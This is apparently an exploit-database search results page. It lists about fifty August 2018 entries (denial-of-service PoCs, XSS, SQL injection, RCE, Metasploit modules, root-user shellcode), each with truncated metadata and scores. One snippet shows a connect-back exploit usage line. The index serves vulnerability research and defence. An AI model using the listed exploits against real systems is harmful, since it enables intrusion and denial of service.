Lucene search
K
ExploitdbRecent

47904 matches found

Exploit DB
Exploit DB
added 2018/08/21 12:0 a.m.28 views

Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)

Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery Delete Post Date: 2018-08-21 Exploit Author: L0RD Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ Version: 1 CVE: N/A Tested on: Win 10 Description : An issue was discovered in Twitter-Clone 1 which allows a remote attacker ...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/20 12:0 a.m.196 views

SEIG Modbus 3.4 - Denial of Service (PoC)

Title: SEIG Modbus 3.4 - Denial of Service PoC Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4 Version: v3.4...

9.3CVSS6.4AI score0.22293EPSS
Exploits10
Exploit DB
Exploit DB
added 2018/08/20 12:0 a.m.49 views

Restorator 1793 - Denial of Service (PoC)

Exploit Title: Restorator 1793 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-19 Homepage: https://www.bome.com/ Software Link: https://www.bome.com/bome/downloads/Restorator2018Full1793.exe Tested Version: v1793 Tested on OS: Windows 7 x64 Steps to Reproduce: Run t...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/20 12:0 a.m.32 views

Prime95 29.4b7 - Denial Of Service (PoC)

Exploit Title: Prime95 29.4b7 - Denial Of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-20 Homepage: http://www.mersenne.org Software Link: http://www.mersenne.org/ftproot/gimps/p95v294b7.win32.zip Tested Version: 29.4b7 Tested on OS: Windows 7 32-bit Steps to Reproduce: Run t...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/20 12:0 a.m.50 views

Zortam MP3 Media Studio 23.95 - Denial of Service (PoC)

Exploit Title: Zortam MP3 Media Studio 23.95 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-19 Homepage: https://www.zortam.com Software Link: https://www.zortam.com/download.html Tested Version: 23.95 Tested on OS: Windows 7 x64 Steps to Reproduce: Run the python...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/20 12:0 a.m.45 views

WordPress Plugin Tagregator 0.6 - Cross-Site Scripting

Exploit Title: WordPress Plugin Tagregator 0.6 - Cross-Site Scripting Date: 2018-05-05 Exploit Author: ManhNho Vendor Homepage: https://wordpress.org/plugins/tagregator/ Software Link: https://downloads.wordpress.org/plugin/tagregator.0.6.zip Ref: https://pastebin.com/ZGr5tyP2 Version: 0.6 Tested...

4.8CVSS5.1AI score0.01912EPSS
Exploits5
Exploit DB
Exploit DB
added 2018/08/20 12:0 a.m.29 views

Countly - Cross-Site Scripting

Exploit Title: Countly-server StoredPersistent XSS Vulnerability Date: Monday - 2018 13 August Author: 10:10AM Team Discovered By: Sleepy Software Link: https://github.com/Countly/countly-server Version: All Version Category: Web-apps Security Risk: Critical Tested on: GNU/Linux Ubuntu 16.04 - wi...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/20 12:0 a.m.46 views

Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution

!/usr/bin/php -c -t: target server ip with or without port -c: connectback server ip and port Example: php ./e.php -t 172.16.175.136 -c 172.16.175.137:1337 ---------------------------------------------------- mrme@pluto:$ ./e.php -t 172.16.175.137 -c 172.16.175.136:1337 Easylogin Pro = v1.3.0...

8.1CVSS8.2AI score0.09675EPSS
Exploits5
Exploit DB
Exploit DB
added 2018/08/20 12:0 a.m.62 views

WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection

Exploit Title: WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection Exploit Author: Çlirim Emini Website: https://www.sentry.co.com Software Link: https://wordpress.org/plugins/chained-quiz/ Version/s: 1.0.8 and below Patched Version: 1.0.9 CVE : N/A WPVULNDB:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/20 12:0 a.m.103 views

SEIG Modbus 3.4 - Remote Code Execution

Title: SEIG Modbus 3.4 - Remote Code Execution Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://github.com/hdbreaker/Ricnar-Exploit-Solutions/tree/master/Medium/CVE-2013-0662-SEIG-Modbus-Driver-v3.34/VERSION%203.4 Version: v3.4...

9.3CVSS6.4AI score0.22293EPSS
Exploits10
Exploit DB
Exploit DB
added 2018/08/20 12:0 a.m.44 views

MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery

Exploit Title: MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery Date: 2018-05-17 Author: 0xB9 Twitter: @0xB9Sec Software Link: https://community.mybb.com/mods.php?action=view&pid=1105 Version: 1.1 Tested on: Ubuntu 18.04 1. Description: The plugin allows moderators to save notes a...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/19 12:0 a.m.64 views

SEIG SCADA System 9 - Remote Code Execution

Title: SEIG SCADA SYSTEM 9 - Remote Code Execution Author: Alejandro Parodi Date: 2018-08-17 Vendor Homepage: https://www.schneider-electric.com Software Link: https://www.schneider-electric.ie/en/download/document/V9Fullinstallationpackageregisterandreceivefile/ Version: v9 Tested on: Windows7 x...

10CVSS6.4AI score0.21262EPSS
Exploits8
Exploit DB
Exploit DB
added 2018/08/17 12:0 a.m.43 views

Microsoft Edge Chakra JIT - Parameter Scope Parsing Type Confusion

// PoC: async function triggera = class b await 1 let spray = ; for let i = 0; i 0016 SetHomeObj R13 R14 001b NewScObjectSimple R9 001d ProfiledStFld R9.value = R2 1 0021 ProfiledStFld R9.done = R4 2 0025 Yield R9 R9 ----------------------------------------------- 0028 ResumeYield R15 R9 002b...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/17 12:0 a.m.46 views

CEWE Photoshow 6.3.4 - Denial of Service (PoC)

Exploit Title: CEWE Photoshow 6.3.4 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-17 Homepage: https://cewe-photoworld.com/ Software Link: https://cewe-photoworld.com/creator-software/windows-download Tested Version: 6.3.4 Tested on OS: Windows 10 Steps to Reproduc...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/17 12:0 a.m.30 views

Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion

/ This is similar to issue 1531 . The patch seems to prevent type confusion triggered from StElemIA instructions. But the SetItem method can also be invoked through the Array.prototype.push method which can be inlineed. We can achieve type confusion with the push method in the same way used for...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/17 12:0 a.m.612 views

Mikrotik WinBox 6.42 - Credential Disclosure (golang)

/ Title: Mikrotik WinBox 6.42 - Credential Disclosure golang edition Author: Maxim Yefimenko @slider Date: 2018-08-06 Sotware Link: https://mikrotik.com/download Vendor Page: https://www.mikrotik.com/ Version: 6.29 - 6.42 Tested on: Fedora 28 \ Debian 9 \ Windows 10 \ Android wherever it was...

9.1CVSS8.7AI score0.96087EPSS
Exploits23
Exploit DB
Exploit DB
added 2018/08/17 12:0 a.m.64 views

ADM 3.1.2RHG1 - Remote Code Execution

Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution Author: Matthew Fulton & Kyle Lovett Date: 2018-07-01 Vendor Homepage: https://www.asustor.com/ Software Link: http://download.asustor.com/download/adm/X64G33.1.2.RHG1.img Version: = ADM 3.1.2RHG1 Tested on: ASUSTOR AS6202T CVE : CVE-2018-11510...

9.8CVSS9.6AI score0.4476EPSS
Exploits9
Exploit DB
Exploit DB
added 2018/08/17 12:0 a.m.79 views

Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion

/ The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the other is for ICU. The problem is that the versions for...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/17 12:0 a.m.52 views

Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion

/ Here's the method. template template void DictionaryPropertyDescriptor::CopyFromDictionaryPropertyDescriptor& descriptor this-Attributes = descriptor.Attributes; this-Data = descriptor.Data == DictionaryPropertyDescriptor::NoSlots ? NoSlots : descriptor.Data; this-Getter = descriptor.Getter ==...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/17 12:0 a.m.79 views

Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl

/ If the Intl object hasn't been initialized, access to any property of it will trigger the initialization process which will run Intl.js. The problem is that it runs Intl.js without caring about the ImplicitCallFlags flag. In the PoC, it redefines Map.prototype.get to intercept the execution of...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/16 12:0 a.m.1653 views

OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)

!/usr/bin/env python Copyright c 2018 Matthew Daley Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files the "Software", to deal in the Software without restriction, including without limitation the rights to use, copy,...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/16 12:0 a.m.68 views

WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData()' Buffer Overflow (PoC)

Exploit Title: WebkitGTK+ 2.20.3 - 'ImageBufferCairo::getImageData' Buffer Overflow PoC Date: 2018-08-15 Exploit Author: PeregrineX Vendor Homepage: https://webkitgtk.org/ & https://webkit.org/wpe/ Software Link: https://webkitgtk.org/releases/ & https://wpewebkit.org/releases/ Version: RefPtr...

8.8CVSS8.7AI score0.10525EPSS
Exploits4
Exploit DB
Exploit DB
added 2018/08/16 12:0 a.m.52 views

ObserverIP Scan Tool 1.4.0.1 - Denial of Service (PoC)

Exploit Title: ObserverIP Scan Tool 1.4.0.1 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-16 Homepage: https://www.ambientweather.com Software Link: https://p10.secure.hostingprod.com/@site.ambientweatherstore.com/ssl/iptools/IPTools64bit.exe Tested Version: 1.4.0....

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/16 12:0 a.m.27 views

WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection

Exploit Title: Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection Exploit Author: Javier Olmedo Website: https://hackpuntes.com Date: 2018-08-14 Google Dork: N/A Vendor: Matt Cromwell Software Link: https://wordpress.org/plugins/export-users-to-csv/ Affected Version: 1.1.1 and before Acti...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/16 12:0 a.m.63 views

TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)

Exploit Title: TP-Link WR840N 0.9.1 3.16 - Denial of Service PoC Exploit Author: Aniket Dinda Date: 2018-08-05 Vendor Homepage: https://www.tp-link.com/ Hardware Link: https://www.amazon.in/TP-LINK-TL-WR840N-300Mbps-Wireless-External/dp/B01A0G1J7Q Version: TP-Link Wireless N Router WR840N Firmwar...

7.5CVSS7.8AI score0.08299EPSS
Exploits4
Exploit DB
Exploit DB
added 2018/08/16 12:0 a.m.64 views

OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions

Exploit Title: OpenEMR 5.0.1.3 - Arbitrary File Actions Date: 2018-08-14 Exploit Author: Joshua Fam Twitter : @Insecurity Vendor Homepage: https://www.open-emr.org/ Software Link: https://github.com/openemr/openemr/archive/v5013.tar.gz Version: 5.0.1.3 Tested on: Ubuntu LAMP, OpenEMR Version...

8.8CVSS7AI score0.18208EPSS
Exploits9
Exploit DB
Exploit DB
added 2018/08/16 12:0 a.m.73 views

Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery

SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: SQL Injection, XSS & CSRF vulnerabilities product: Pimcore vulnerable version: 5.2.3 and below fixed version: 5.3.0 CVE number: CVE-2018-14057, CVE-2018-14058,...

8.8CVSS6.4AI score0.2895EPSS
Exploits9
Exploit DB
Exploit DB
added 2018/08/16 12:0 a.m.50 views

Central Management Software 1.4.13 - Denial of Service (PoC)

Exploit Title: Central Management Software v1.4.13 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-16 Homepage: https://www.ambientweather.com Software Link:...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/15 12:0 a.m.28 views

ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass

Title: ASUS-DSL N10 1.1.2.217 - Authentication Bypass Author: AmnBAN team Date: 2018-08-06 Vendor Homepage: https://www.asus.com/Networking/DSLN10C1with5dBiantenna/ Sofrware version: 1.1.2.217 CVE: N/A 1. Description: In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.217 there is loginauthorization...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/15 12:0 a.m.75 views

ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection

Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds Vendor - https://www.asustor.com/ Patch Notes - http://download.asustor.com/download/docs/releasenotes/RNADM3.1.3.RHU2.pdf Issue: The Asustor NAS appliance on ADM 3.1.0 and before suffer from multiple critical vulnerabilities. The...

9.8CVSS9.8AI score0.4476EPSS
Exploits13
Exploit DB
Exploit DB
added 2018/08/15 12:0 a.m.55 views

JioFi 4G M2S 1.0.2 - Denial of Service (PoC)

Exploit Title: JioFi 4G M2S 1.0.2 - Denial of Service PoC Exploit Author: Vikas Chaudhary Date: 2018-07-26 Vendor Homepage: https://www.jio.com/ Hardware Link:...

6.8CVSS6.7AI score0.05283EPSS
Exploits4
Exploit DB
Exploit DB
added 2018/08/14 12:0 a.m.83 views

Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)

Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal Metasploit Author: Dhiraj Mishra Date: 2018-08-14 Software: Oracle Glassfish Server OSE Version: 4.1 Software link: http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip CVE: 2017-1000028 This module requires Metasploit:...

7.5CVSS7.4AI score0.99479EPSS
Exploits7
Exploit DB
Exploit DB
added 2018/08/14 12:0 a.m.63 views

Wansview 1.0.2 - Denial of Service (PoC)

Exploit Title: Wansview 1.0.2 - Denial of Service PoC Author: Gionathan "John" Reale Discovey Date: 2018-08-14 Software Link: http://www.wansview.com/uploads/soft/Wansviewv1.0.2.exe Tested Version: 1.0.2 Tested on OS: Windows 10 Steps to Reproduce: Run the python exploit script, it will create a...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/14 12:0 a.m.121 views

Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Path Traversal in Oracle GlassFish Server Open Source Edition', 'Description' = %q This module exploits an unauthenticated directory traversal...

7.5CVSS7.4AI score0.99479EPSS
Exploits7
Exploit DB
Exploit DB
added 2018/08/14 12:0 a.m.65 views

Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)

Exploit Title: Cloudme 1.9 - Buffer Overflow DEP Metasploit Date: 2018-08-13 Exploit Author: Raymond Wellnitz Vendor Homepage: https://www.cloudme.com Version: 1.8.x/1.9.x Tested on: Windows 7 x64 CVE : 2018-6892 This module requires Metasploit: https://metasploit.com/download Current source:...

9.8CVSS9AI score0.93597EPSS
Exploits29
Exploit DB
Exploit DB
added 2018/08/14 12:0 a.m.43 views

cgit 1.2.1 - Directory Traversal (Metasploit)

Title: cgit 1.2.1 - Directory Traversal Metasploit Author: Dhiraj Mishra Software: cgit Link: https://git.zx2c4.com/cgit/ Date: 2018-08-14 CVE: CVE-2018-14912 This module exploits a directory traversal vulnerability which exists in cgit 'cgit Directory Traversal', 'Description' = %q This module...

7.5CVSS7.5AI score0.93188EPSS
Exploits7
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.72 views

Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)

Linux/x64 - Add Root User toor/toor Shellcode 99 bytes. Shellcode exploit for Linuxx86-64 platform ; Title: add root user toor:toor ; Date: 20180811 ; Author: epi ; https://epi052.gitlab.io/notes-to-self/ ; Tested on: linux/x8664 SMP CentOS-7 3.10.0-862.2.3.el7.x8664 GNU/Linux ; ; Shellcode Lengt...

0.1AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.39 views

Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)

Exploit Title: Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service PoC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovey Date: 2018-08-13 Vendor Homepage: https://switchportmapper.com/ Software Link: https://switchportmapper.com/download/spm2812.zip...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.113 views

Oracle Weblogic Server - Deserialization Remote Code Execution (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/exploit/powershell' class MetasploitModule 'Oracle Weblogic Server Deserialization RCE', 'Description' = %q An unauthenticated attacker with network...

9.8CVSS7.4AI score0.99448EPSS
Exploits69
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.57 views

IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting

Exploit Title: IBM Sterling B2B Integrator persistent cross-site scripting Exploit Author: Vikas Khanna https://www.linkedin.com/in/leetvikaskhanna/ https://twitter.com/MRSHANUKHANNA Vendor Homepage:...

5.4CVSS5.8AI score0.0294EPSS
Exploits5
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.180 views

PostgreSQL 9.4-0.5.3 - Privilege Escalation

Exploit Title: PostgreSQL 9.4-0.5.3 - Privilege Escalation Date: 2017-10-11 Exploit Author: Johannes Segitz Vendor Homepage: https://bugzilla.suse.com/showbug.cgi?id=1062722 Software Link: - Version: Before postgresql-init-9.4-0.5.3.1 Tested on: SUSE Linux Enterprise 11 SP4 CVE : CVE-2017-14798...

7.3CVSS7.3AI score0.01016EPSS
Exploits4
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.54 views

Monitoring software iSmartViewPro 1.5 - 'SavePath for ScreenShots' Buffer Overflow

Exploit Title: iSmartViewPro 1.5 - 'SavePath for ScreenShots' Local Buffer Overflow Author: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovey Date: 2018-08-12 Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5 Tested...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.90 views

Android - Directory Traversal over USB via Injection in blkid Output

When a USB mass storage device is inserted into an Android phone even if the phone is locked!, vold will attempt to automatically mount partitions from the inserted device. For this purpose, vold has to identify the partitions on the connected device and collect some information about them, which...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.64 views

PLC Wireless Router GPN2.4P21-C-CN - Denial of Service

Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Unauthenticated Remote Reboot Date: 8/12/2018 Exploit Author: Chris Rose Affected Model : GPN2.4P21-C-CNFirmware: W2001EN-00 Vendor: ChinaMobile Tested on: Debian Linux Shodan dork- title:PLC CVE: None Description: PLC Wireless Router's are...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.63 views

Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC)

Exploit Title : Acunetix Web Vulnerability Scanner 10.0 Build 20150623 - Denial of Service PoC Discovery by: Javier Enrique Rodriguez Gutierrez Discovery Date : 2018-08-11 Vendor Homepage: https://www.acunetix.com Tested Version : 10.0 Vulnerability Type : Denial of Service PoC Tested on OS :...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.70 views

Microsoft DirectX SDK - 'Xact.exe' Remote Code Execution

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DIRECTX-SDK-XACT.EXE-TROJAN-FILE-CODE-EXECUTION.txt + ISR: Apparition Security Greetz: indoushka | Eduardo Vendor ============= www.microsoft.com Product ===========...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/13 12:0 a.m.54 views

IP Finder 1.5 - Denial of Service (PoC)

Exploit Title: IP Finder 1.5 - Denial of Service PoC Author: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovey Date: 2018-08-12 Software Link: https://securimport.com/university/index.php/videovigilancia-ip/software/429-ip-finder Tested Version: 1.5 Tested on OS: Windows XP...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/10 12:0 a.m.48 views

MyBB Like Plugin 3.0.0 - Cross-Site Scripting

Exploit Title: MyBB Like Plugin 3.0.0 - Cross-Site Scripting Date: 2018-08-01 Author: 0xB9 Twitter: @0xB9Sec Software Link: https://community.mybb.com/mods.php?action=view&pid=360 Version: 3.0.0 Tested on: Ubuntu 18.04 CVE: N/A 1. Description: This plugin allows users to thank/like other users...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/10 12:0 a.m.41 views

iSmartViewPro 1.5 - 'Password' Buffer Overflow

Exploit Title: iSmartViewPro 1.5 - 'Password' Buffer Overflow Discovery by: Javier Enrique Rodriguez Gutierrez Discovery Date: 2018-08-09 Vendor Homepage: https://securimport.com/ Software Link: https://securimport.com/university/videovigilancia-ip/software/493-software-ismartviewpro-v1-5 Tested...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2018/08/10 12:0 a.m.43 views

MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting

Exploit Title: MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting Date: 8/1/2018 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://community.mybb.com/mods.php?action=view&pid=360 Version: 3.0.0 Tested on: Ubuntu 18.04 CVE: CVE-2018-14888 1. Description: This plugin...

6.1CVSS6.3AI score0.0368EPSS
Exploits5
Total number of security vulnerabilities47904